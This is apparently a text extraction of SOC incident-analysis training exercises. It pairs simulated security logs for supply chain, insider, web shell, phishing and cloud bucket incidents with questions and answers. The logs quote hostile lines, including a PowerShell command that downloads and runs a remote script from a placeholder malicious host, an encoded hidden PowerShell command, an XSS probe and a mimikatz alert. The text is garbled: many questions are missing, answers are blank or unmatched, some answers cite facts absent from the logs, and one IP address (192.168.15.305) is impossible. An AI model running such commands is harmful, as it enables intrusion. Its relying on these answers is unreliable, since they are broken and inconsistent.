INCIDENT 11
INCIDENT 11
ANALYST
INCIDENT
ANALYSIS
EXERCISES WITH
QUESTIONS AND
ANSWERS
BY IZZMIER IZZUDDIN
SET 1: SUPPLY CHAIN COMPROMISE
Logs
Firewall Logs
Date: 2024-12-26T03:45:12Z
Source IP: 192.168.1.45
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 234,657
Bytes Received: 1,045,234
Date: 2024-12-26T03:50:24Z
Source IP: 192.168.1.45
Destination IP: 123.45.67.89
Destination Port: 22
Protocol: SSH
Action: BLOCKED
Bytes Sent: 987
Bytes Received: 0
Date: 2024-12-26T03:55:10Z
Source IP: 192.168.1.100
Destination IP: 8.8.8.8
Destination Port: 53
Protocol: DNS
Query: suspicious-malware-site[.]com
Action: ALLOWED
Timestamp: 2024-12-26T03:35:40Z
Source IP: 192.168.1.45
Query: suspicious-malware-site[.]com
Response: 45.67.89.123
Timestamp: 2024-12-26T03:40:50Z
Source IP: 192.168.1.45
Query: update[.]legit-software[.]com
Response: 23.45.67.89
QUESTIONS
Logs
Date: 2024-12-26T03:50:20Z
Event ID: 4624
Logon Type: 3
Account Name: attacker_account
Source Network Address: 192.168.1.45
Target: SERVER-01
Authentication Package: NTLM
Status: Success
Date: 2024-12-26T03:52:30Z
Event ID: 4625
Logon Type: 3
Account Name: admin_user
Source Network Address: 192.168.1.45
Target: SERVER-02
Authentication Package: NTLM
Status: Failed
Date: 2024-12-26T03:54:00Z
Event ID: 4673
Process: rundll32.exe
Privilege: SeDebugPrivilege
Target: C:\Windows\System32\winlogon.exe
Result: Success
Date: 2024-12-26T03:55:10Z
Event ID: 4688
New Process Created: C:\Windows\Temp\malicious_script.ps1
Account Name: SYSTEM
Parent Process: C:\Windows\System32\svchost.exe
Timestamp: 2024-12-26T03:50:18Z
Source IP: 192.168.1.45
Destination IP: 192.168.1.50
Protocol: SMB
Action: Allowed
Timestamp: 2024-12-26T03:55:00Z
Source IP: 192.168.1.50
Destination IP: 192.168.1.51
Protocol: RDP
Action: Allowed
QUESTIONS
Logs
Firewall Logs
Date: 2024-12-26T04:10:15Z
Source IP: 192.168.1.50
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 4,503,241
Bytes Received: 1,023,109
Date: 2024-12-26T04:15:10Z
Source IP: 192.168.1.50
Destination IP: 89.67.45.123
Destination Port: 80
Protocol: HTTP
Action: BLOCKED
Bytes Sent: 9,432
Bytes Received: 0
Proxy Logs
Date: 2024-12-26T04:10:12Z
User: SYSTEM
URL: https://45.67.89.123/upload
Request Size: 4,503,241 bytes
Response Code: 200 OK
Date: 2024-12-26T04:15:05Z
User: SYSTEM
URL: http://malware-c2[.]com/exfil
Request Size: 9,432 bytes
Response Code: Blocked
Date: 2024-12-26T04:09:40Z
Source IP: 192.168.1.50
Query: malware-c2[.]com
Response: 89.67.45.123
Date: 2024-12-26T04:10:05Z
Source IP: 192.168.1.50
Query: upload.malicious-c2[.]com
Response: 45.67.89.123
QUESTIONS
1. What was the size of the data exfiltrated during the attack?
2. Which protocol was used for data exfiltration?
3. What domain is associated with the data exfiltration attempt?
4. What triggered the SIEM's "Unusual Data Transfer Volume" rule?
5. What action was taken against the HTTP data exfiltration attempt?
6. What other evidence suggests malicious intent in the data exfiltration?
7. Why is using HTTPS advantageous for attackers during data exfiltration?
8. What additional steps can be taken to confirm the content of the exfiltrated data?
9. What mitigation measures could prevent such data exfiltration in the future?
10. How can threat intelligence enhance detection of such attacks?
SET 4: MALWARE ANALYSIS
Logs
Date: 2024-12-26T04:30:05Z
Alert: "Suspicious File Downloaded"
File Name: payload.exe
Hash: a1b2c3d4e5f67890abcdef1234567890
Download URL: http://malicious-site[.]com/payload.exe
User: SYSTEM
Action: Alerted
Date: 2024-12-26T04:32:10Z
Alert: "Malware Execution Detected"
Process: payload.exe
Parent Process: explorer.exe
Host: SERVER-02
Action: Quarantined
Date: 2024-12-26T04:35:20Z
Alert: "Persistence Mechanism Detected"
File: C:\Windows\System32\startuplink.dll
Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup
Action: Alerted
Timestamp: 2024-12-26T04:31:00Z
Source IP: 192.168.1.50
Destination IP: 203.0.113.42
Protocol: HTTP
URL: http://malicious-site[.]com/payload.exe
Action: Allowed
Timestamp: 2024-12-26T04:35:00Z
Source IP: 192.168.1.50
Destination IP: 203.0.113.50
Protocol: HTTPS
Action: Allowed
Bytes Sent: 1,500
Bytes Received: 6,200
Date: 2024-12-26T04:32:15Z
Event ID: 4688
New Process Created: C:\Users\Admin\AppData\Local\Temp\payload.exe
Account Name: SYSTEM
Parent Process: explorer.exe
Date: 2024-12-26T04:34:10Z
Event ID: 4657
Registry Value Modified:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup
Process: regedit.exe
QUESTIONS
Logs
HR Records
Employee: Izzmier
Role: Database Administrator
Last Performance Review: 2024-11-01 (Satisfactory)
Resignation Notice: 2024-12-20 (Effective 2024-12-31)
Recent Complaints: None Logged
Date: 2024-12-25T21:05:00Z
User: Izzmier
Database: Finance_DB
Action: SELECT * FROM customer_data
Records Affected: 1,000,000
Source IP: 192.168.1.102
Date: 2024-12-25T21:15:00Z
User: Izzmier
Database: Finance_DB
Action: Export customer_data to file
File Name: customers_2024.csv
Records Exported: 1,000,000
Endpoint Logs
Date: 2024-12-25T21:20:00Z
User: Izzmier
File: C:\Users\Izzmier\Desktop\customers_2024.csv
Action: Uploaded to external drive
Device: USB Device (Vendor: Generic, Serial: A123B456)
Action: Completed
Date: 2024-12-25T21:30:00Z
Source IP: 192.168.1.102
Destination IP: 203.0.113.200
Protocol: HTTPS
Data Transferred: 10 MB
Action: Allowed
Access Anomalies
Date: 2024-12-25T21:05:00Z
Alert: "Database Access Outside Normal Hours"
User: Izzmier
Triggered Rule: "Access to sensitive tables after business hours"
QUESTIONS
Logs
Firewall Logs
Timestamp: 2024-12-20T23:45:12Z
Source IP: 192.0.2.55
Destination IP: 192.168.10.5
Protocol: HTTPS
Action: Allowed
Bytes Sent: 2,000
Bytes Received: 15,500
Timestamp: 2024-12-21T00:30:45Z
Source IP: 104.21.65.140
Destination IP: 192.168.10.10
Protocol: HTTPS
Action: Allowed
Bytes Sent: 3,500
Bytes Received: 20,700
Date: 2024-12-21T01:05:00Z
Alert: "Suspicious PowerShell Script Execution"
Process: powershell.exe
Command: "iex(New-Object Net.WebClient).DownloadString('http://malicious-
site[.]com/init.ps1')"
Host: SERVER-DB01
Action: Blocked
Date: 2024-12-21T01:10:00Z
Alert: "Credential Dumping Detected"
Tool: mimikatz.exe
Process Path: C:\Temp\mimikatz.exe
User: Administrator
Host: SERVER-APP01
Action: Quarantined
Date: 2024-12-21T01:15:00Z
Event ID: 4625
Failed Login Attempt
User: Administrator
Source Workstation: SERVER-APP01
Date: 2024-12-21T01:16:00Z
Event ID: 4672
Privileged Access Granted
User: SYSTEM
Source Workstation: SERVER-DB01
SIEM Alerts
Date: 2024-12-21T01:20:00Z
Alert: "Multiple Host Compromises Detected"
Source: Threat Correlation Engine
Severity: High
Hosts Involved: SERVER-DB01, SERVER-APP01, SERVER-FILE01
QUESTIONS
Logs
Date: 2024-12-22T10:12:45Z
IP Address: 203.0.113.45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/117.0.0.0 Safari/537.36
Request: POST /vulnerable_endpoint.php HTTP/1.1
Payload: {"input":"<script>alert('XSS')</script>"}
Response Code: 500 (Internal Server Error)
Date: 2024-12-22T10:13:30Z
IP Address: 203.0.113.45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/117.0.0.0 Safari/537.36
Request: POST /vulnerable_endpoint.php HTTP/1.1
Payload: {"input":"<malicious_code>shell_upload</malicious_code>"}
Response Code: 200 (Success)
Date: 2024-12-22T10:14:15Z
Source IP: 203.0.113.45
Destination IP: 192.168.10.20
Protocol: HTTP
Bytes Sent: 1,500
Bytes Received: 25,000
Action: Allowed
Date: 2024-12-22T10:15:00Z
Source IP: 192.168.10.20
Destination IP: 203.0.113.46
Protocol: HTTPS
Bytes Sent: 10,000
Bytes Received: 500
Action: Allowed
Date: 2024-12-22T10:13:40Z
File Created: /var/www/html/uploads/malicious_shell.php
User: www-data
Process: apache2
Action: Write
Date: 2024-12-22T10:15:10Z
File Executed: /var/www/html/uploads/malicious_shell.php
User: www-data
Process: php
Action: Execute
Date: 2024-12-22T10:15:30Z
Alert: "Suspicious File Upload Detected"
Severity: Critical
Description: File 'malicious_shell.php' uploaded and executed on Web Server.
Host: WEB-SERVER01
Source IP: 203.0.113.45
Destination IP: 192.168.10.20
QUESTIONS
Logs
Email Logs
Date: 2024-12-23T08:15:30Z
From: [email protected]
To: [email protected]
Subject: Urgent: Security Patch Update
Attachment: update_security_patch.exe
Date: 2024-12-23T08:16:00Z
User: [email protected]
Action: Opened attachment
Date: 2024-12-23T08:17:15Z
Alert: "Unrecognised Executable File Execution"
Process: update_security_patch.exe
File Hash: e3b0c44298fc1c149afbf4c8996fb924
Action: Blocked
Host: WORKSTATION-102
Date: 2024-12-23T08:17:45Z
Alert: "Unauthorised PowerShell Script Execution"
Command: powershell.exe -nop -w hidden -encodedcommand
"YXBwIHJ1bnMgdXByYW5jIGFuZCB1cGxvYWRzIG1hbHdhcmU="
Host: WORKSTATION-102
Action: Allowed
Firewall Logs
Date: 2024-12-23T08:18:10Z
Source IP: 192.168.10.102
Destination IP: 192.0.2.200
Protocol: HTTPS
Action: Allowed
Bytes Sent: 5,000
Bytes Received: 500
Date: 2024-12-23T08:19:00Z
Source IP: 192.168.10.102
Destination IP: 203.0.113.10
Protocol: HTTPS
Action: Allowed
Bytes Sent: 10,500
Bytes Received: 15,000
Date: 2024-12-23T08:20:00Z
Alert: "Possible Supply Chain Compromise"
Severity: Critical
Description: Suspicious executable (update_security_patch.exe) detected from a vendor
email.
Affected Host: WORKSTATION-102
Date: 2024-12-23T08:21:30Z
Source: WORKSTATION-102
Queried Domain: malicious-c2[.]com
Response: 203.0.113.10
QUESTIONS
Logs
Date: 2024-12-24T03:10:45Z
User: anonymous
Action: GET
Resource: s3://sensitive-data-bucket/financial_report_2024.xlsx
Response Code: 200 (Success)
Source IP: 203.0.113.55
Date: 2024-12-24T03:11:30Z
User: anonymous
Action: LIST
Resource: s3://sensitive-data-bucket/
Response Code: 200 (Success)
Source IP: 203.0.113.55
Date: 2024-12-24T03:12:10Z
User: anonymous
Action: DELETE
Resource: s3://sensitive-data-bucket/backups/
Response Code: 204 (No Content)
Source IP: 203.0.113.55
Firewall Logs
Date: 2024-12-24T03:09:00Z
Source IP: 203.0.113.55
Destination IP: 192.0.2.100
Protocol: HTTPS
Bytes Sent: 3,500
Bytes Received: 10,000
Action: Allowed
Date: 2024-12-24T03:10:00Z
Source IP: 203.0.113.55
Destination IP: 192.0.2.101
Protocol: HTTPS
Bytes Sent: 5,000
Bytes Received: 20,000
Action: Allowed
Cloud Security Alerts
Date: 2024-12-24T03:13:00Z
Alert: "Publicly Accessible Bucket Detected"
Severity: High
Resource: s3://sensitive-data-bucket/
Date: 2024-12-24T03:15:30Z
Alert: "Suspicious Anonymous Access to Cloud Bucket"
Severity: Critical
Description: Anonymous user accessed and modified sensitive data in cloud storage.
Affected Resource: s3://sensitive-data-bucket/
Source IP: 203.0.113.55
Indicator: 203.0.113.55
Category: Known Threat Actor
Description: IP associated with cloud bucket exploitation and ransomware deployment.
QUESTIONS
Logs
Email Logs
Date: 2024-12-25T14:10:30Z
From: [email protected]
To: [email protected]
Subject: [Urgent] System Performance Analysis Required
Body: Dear User,
Our automated system has detected unusual performance issues in your workstation.
Please download and run the attached diagnostic tool immediately to avoid system
shutdown.
Attachment: performance_analysis_tool.exe
Date: 2024-12-25T14:12:00Z
Alert: "Suspicious Executable File Detected"
Process: performance_analysis_tool.exe
File Hash: 8df48e58b0a1fcb99eabcd00112d34f7
Action: Allowed
Host: WORKSTATION-305
Date: 2024-12-25T14:12:15Z
Alert: "AI-Driven Malware Behavior Detected"
Process: AI_malware.exe (spawned by performance_analysis_tool.exe)
Action: Allowed
Behavior: Data exfiltration pattern recognised.
Date: 2024-12-25T14:13:30Z
Source IP: 192.168.15.305
Destination IP: 198.51.100.45
Protocol: HTTPS
Bytes Sent: 15,000
Bytes Received: 3,500
Action: Allowed
Date: 2024-12-25T14:14:00Z
Source IP: 192.168.15.305
Destination IP: 203.0.113.20
Protocol: HTTPS
Bytes Sent: 50,000
Bytes Received: 10,000
Action: Allowed
Date: 2024-12-25T14:15:00Z
Alert: "High-Speed Data Exfiltration Detected"
Severity: Critical
Source: WORKSTATION-305
Destination: External IPs (198.51.100.45, 203.0.113.20)
Description: Large volumes of data exfiltrated in a short time frame.
Date: 2024-12-25T14:16:00Z
Process: AI_malware.exe
Behavior: Adaptive and polymorphic. Changed hash to
4a8b3f9c0ef12a67edbc34500d1f78de.
Capabilities Detected:
- Real-time evasion of antivirus.
- AI-driven identification of unprotected files.
- Use of stealthy exfiltration methods (encrypted HTTPS channels).
QUESTIONS
SET 1
Answer: The IP 45.67.89.123 was identified as the C2 server based on the HTTPS traffic
logs.
Answer: The EDR quarantined the file update.exe and blocked suspicious network
activity.
6. What is the significance of the blocked SSH attempt in the firewall logs?
Answer: The HTTPS protocol was used for large data transfers to the suspected C2
server.
8. How did the SIEM correlate the DNS traffic with the malicious activity?
Answer: The SIEM rule matched the DNS query to a list of known malicious domains
and correlated it with the outbound network traffic.
Answer: Implement strict update validation processes, regular DNS monitoring and
enhanced endpoint controls.
SET 2
Answer: The Windows Event Log (Event ID 4624) shows a successful login using the
account attacker_account from 192.168.1.45 to SERVER-01.
Answer: Event ID 4625 indicates a failed login attempt on SERVER-02 by the admin_user,
suggesting the attacker was probing for valid credentials.
Answer: Event ID 4673 shows that the attacker used rundll32.exe to enable
SeDebugPrivilege, which is often exploited to gain higher privileges.
Answer: The logs indicate that the attacker used the SMB protocol for lateral movement
between hosts.
Answer: The SIEM identified a pattern of suspicious logins, privilege escalation and
process creation that triggered correlation rules for lateral movement.
8. What can be inferred from the RDP traffic in the network logs?
Answer: The attacker may have used RDP from 192.168.1.50 to 192.168.1.51 to maintain
remote access after achieving lateral movement.
1. What was the size of the data exfiltrated during the attack?
Answer: The logs indicate that approximately 4.5 MB of data was transferred to the C2
server at 45.67.89.123.
Answer: The attacker used the HTTPS protocol for the exfiltration, as shown in the firewall
and proxy logs.
Answer: A single data transfer of 4.5 MB from SERVER-02 to the external IP 45.67.89.123
was identified as anomalous.
5. What action was taken against the HTTP data exfiltration attempt?
Answer: The HTTP request to malware-c2[.]com was blocked by the proxy, as indicated in
the logs.
Answer: DNS queries to known malicious domains (malware-c2[.]com) and large HTTPS
transfers to external IPs are clear signs of data exfiltration.
Answer: HTTPS encrypts traffic, making it harder to inspect and detect malicious
activities.
8. What additional steps can be taken to confirm the content of the exfiltrated data?
Answer: Investigate packet capture logs (if available) or analyse file transfer details from
the affected host.
9. What mitigation measures could prevent such data exfiltration in the future?
Answer: Implement data loss prevention (DLP) systems, block known malicious domains
and monitor unusual data transfer patterns.
Answer: Threat intelligence can provide updated indicators of compromise (IOCs), such
as malicious domains and IPs, for correlation and real-time detection.
SET 4
Answer: Endpoint detection systems flagged the file based on its behavior and VirusTotal
analysis showed it was detected by 54/60 vendors.
5. Which registry key was modified as part of the malware's persistence mechanism?
Answer: The malware communicated with a C2 server at 203.0.113.50 using the HTTPS
protocol.
8. What specific mitigations could have stopped this malware earlier in the kill chain?
Answer: URL filtering could block access to malicious sites and endpoint protection could
prevent execution of untrusted files.
9. How would you ensure the malware is completely removed from the system?
Answer: Steps include removing the registry key, deleting the file, terminating malicious
processes and scanning the system with antivirus software.
10. How can the SOC team strengthen defenses against similar attacks?
Answer: Implementing application whitelisting, enhancing network monitoring for C2
communication and educating users to avoid downloading files from untrusted sources.
SET 5
Answer: The user, Izzmier, accessed and exported a full customer database (Finance_DB)
outside of normal working hours.
Answer: The access occurred outside of normal business hours, involved a large data
export and the file was moved to an unauthorised external device.
Answer: The rule "Access to sensitive tables after business hours" was triggered when
Izzmier accessed the Finance_DB at 21:05.
Answer: Yes, the network logs show a transfer of 10 MB from Izzmier’s system to an
external IP (203.0.113.200) over HTTPS.
Answer: Both the network logs indicating external data transfer and the endpoint logs
showing a file upload to a USB device confirm exfiltration.
Answer: Disable Izzmier’s account, confiscate the USB drive, block the external IP address
and initiate an investigation into the destination server.
Answer: Implementing data loss prevention (DLP) tools, restricting external storage
devices and monitoring sensitive data access in real-time could have helped prevent the
incident.
10. What corrective actions should be taken for future insider threats?
Answer: Strengthen access controls, enforce least privilege, conduct regular employee
audits and increase monitoring during the resignation period of employees.
SET 6
4. What PowerShell command was executed on SERVER-DB01 and what was its
purpose?
5. Which two external IPs were communicating with the internal network and why is
this significant?
Answer: The external IPs 192.0.2.55 and 104.21.65.140 were communicating with the
network. These are known C2 IPs associated with APT-29.
Answer: Privileged access was granted through an event (ID: 4672) involving the SYSTEM
account on SERVER-DB01.
7. What indicators of compromise (IOCs) should be shared with other teams for
proactive defense?
10. How can threat hunting processes be improved to prevent future incidents?
Answer: A zero-day exploit targeting a vulnerable PHP file upload module to achieve
remote code execution.
Answer: The file was executed, potentially granting the attacker remote access to the web
server.
5. Which hosts were involved in the network traffic during the incident?
Answer: The involved hosts were the attacker (203.0.113.45), the web server
(192.168.10.20) and another external IP (203.0.113.46), possibly a Command-and-Control
(C2) server.
Answer:
Answer: Disable the vulnerable file upload functionality temporarily and implement input
validation and sanitisation.
Answer:
Answer:
10. What potential impact could this attack have if not contained?
Answer:
Answer: The attacker delivered the payload via a spear-phishing email masquerading as a
trusted vendor update.
2. What file was executed by the target user and what was its hash?
3. What suspicious activity occurred on the workstation after the file execution?
Answer:
Answer:
• 192.0.2.200
• 203.0.113.10
Answer:
Answer:
7. How can the organisation validate the legitimacy of the vendor’s email?
Answer: By contacting the vendor through official channels and verifying the email’s
content and attachment.
Answer:
9. What proactive defenses could mitigate supply chain attacks in the future?
Answer:
10. What steps should be taken to determine the scope of this compromise?
Answer:
Answer:
Answer: The attacker’s IP is 203.0.113.55, identified as a known threat actor in the threat
intelligence feed.
Answer: Logs showed anonymous access to the bucket with a successful GET request for
sensitive data.
Answer:
Answer:
Answer:
• Exposure of sensitive financial data to unauthorised parties.
• Potential use of the data for extortion or fraud.
• Loss of critical backups, hindering recovery efforts.
Answer:
Answer:
Answer:
Answer: The malware was delivered via a spear-phishing email containing an attachment
(performance_analysis_tool.exe).
3. What external IPs were involved in the data exfiltration and what are they
associated with?
Answer:
• 198.51.100.45
• 203.0.113.20 These are known Command-and-Control (C2) servers used in AI-
powered malware campaigns.
Answer:
• Original: 8df48e58b0a1fcb99eabcd00112d34f7
• Polymorphic: 4a8b3f9c0ef12a67edbc34500d1f78de
Answer:
Answer:
Answer:
Answer:
Answer:
Answer: